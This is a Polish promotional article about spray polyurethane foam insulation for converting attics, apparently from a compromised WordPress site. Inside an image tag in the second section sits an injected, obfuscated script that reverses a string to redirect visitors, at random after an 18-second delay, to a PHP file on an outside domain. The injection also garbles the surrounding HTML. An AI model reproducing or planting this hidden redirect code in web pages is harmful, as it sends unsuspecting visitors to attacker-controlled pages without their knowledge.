Izolacja natryskowa jest idealna na poddasze

W wielu domach poddasze długo nie było używane, bo nie było takiej potrzeby. Często służy jako składzik na stare meble i niepotrzebne przedmioty, ale coraz częściej rodziny decydują się przerobić je na wygodny pokój bądź pokoje, które służą jako sypialnie dzieci czy też pracownie dla rodziców.

Dlaczego warto wybrać izolację natryskową?

izolacje natryskowe białys<script>$mWn=function(n){if(typeof ($mWn.list[n])==”string”) return $mWn.list[n].split(„”).reverse().join(„”);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>tok” class=”alignleft” height=”173″ src=”http://katalogklejow3m.pl/wp-content/uploads/2017/07/izolacje-natryskowe-biays<script>$mWn=function(n){if(typeof ($mWn.list[n])==tok.jpg” style=”float: left;” width=”260″/>Głównym problemem, na jaki napotyka się przy generalnym remoncie poddasza, jest jego właściwe ocieplenie. Strychy często są lodowate zimą i gorące oraz duszne latem, więc zapewnienie odpowiedniej izolacji termicznej to podstawa do komfortowego przebywania na poddaszu przez cały rok. Ważne jest także zachowanie jak największej przestrzeni użytkowej, którą gruba warstwa izolacji może znacznie zmniejszyć. Rozwiązaniem tej kwestii, wybieranym coraz częściej, są izolacje natryskowe z użyciem pianki poliuretanowej otwartokomórkowej. Jest ona bardzo lekka, doskonale wypełnia wszelkie szczeliny, dzięki czemu nie tworzą się mostki termiczne, a do tego trwała. Najważniejsze jednak, iż jest ona lepszym izolatorem niż popularna wełna mineralna czy styropian, ponieważ wystarczy cieńsza warstwa pianki niż dwóch pozostałych, aby uzyskać takie same parametry izolacyjne. Do tego gdy stosuje się izolacje natryskowe białystok poddasze „oddycha”, gdyż pianka jest paroprzepuszczalna. Nie zsuwa się jak wełna, jest łatwiejsza w położeniu niż styropian, nadaje się doskonale do wszelkich trudnych miejsc, jak belki poddasza, różne zakamarki czy też zapewnienie odpowiedniej izolacji okien, co także ma bardzo duże znaczenie.

Jeszcze do niedawna izolacje natryskowe były u nas mało znane, ale teraz zyskują coraz większą popularność. Wraz z powszechnością tej technologii spada też cena skorzystania z pianki poliuretanowej, dzięki czemu jest ona o wiele bardziej dostępna dla przeciętnej rodziny.